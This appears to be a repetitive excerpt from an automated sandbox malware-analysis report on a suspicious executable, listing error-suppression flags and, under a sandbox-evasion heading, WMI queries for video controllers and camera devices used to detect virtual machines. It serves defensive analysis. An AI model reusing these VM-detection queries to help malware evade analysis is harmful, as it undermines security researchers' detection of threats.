Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
